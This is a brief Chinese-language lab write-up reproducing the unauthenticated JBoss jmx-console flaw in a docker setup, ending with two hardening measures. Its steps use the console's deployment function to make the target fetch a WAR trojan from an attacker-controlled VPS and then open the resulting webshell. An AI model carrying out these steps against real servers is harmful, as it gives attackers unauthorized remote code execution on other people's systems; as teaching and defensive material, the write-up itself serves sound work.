0x01 漏洞描述
JBoss是一個基於J2EE的開放源代碼應用服務器,代碼遵循LGPL許可,可以在任何商業應用中免費使用;JBoss也是一個管理EJB的容器和服務器,支持EJB 1.1、EJB 2.0和EJB3規范。,默認情況下訪問 http://ip:8080/jmx-console 就可以瀏覽 JBoss 的部署管理的信息不需要輸入用戶名和密碼可以直接部署上傳木馬有安全隱患。
0x02 環境搭建
目標靶機:mac os
ip:192.168.2.85
攻擊機:windows 7
ip:192.168.2.86
木馬服務器:centos
ip:39.xxx.xxx.88 //安全起見隱藏個人vps
1.使用docker拉取Jboss鏡像,並且運行Jboss
docker search testjboss
docker pull testjboss/jboss:latest
docker images
docker run -p 8080:8080 -d 5661a2e31006
0x03 漏洞復現
未授權放分訪問
http://192.168.2.85:8080/jmx-console/ 無需認證進入控制頁面
利用jboss.deployment部署shell
利用vps搭建遠程木馬服務器
在下圖的地方訪問木馬服務器http://39.xxx.xxx.88/test3693.war (圖片填寫地址有誤,請參考自己的vps地址)
上傳war包木馬成功
訪問http://192.168.2.85:8080/test3693/
漏洞利用成功...
0x04 防御措施
- 對jmx控制頁面訪問添加訪問驗證。
- 進行JMX Console 安全配置。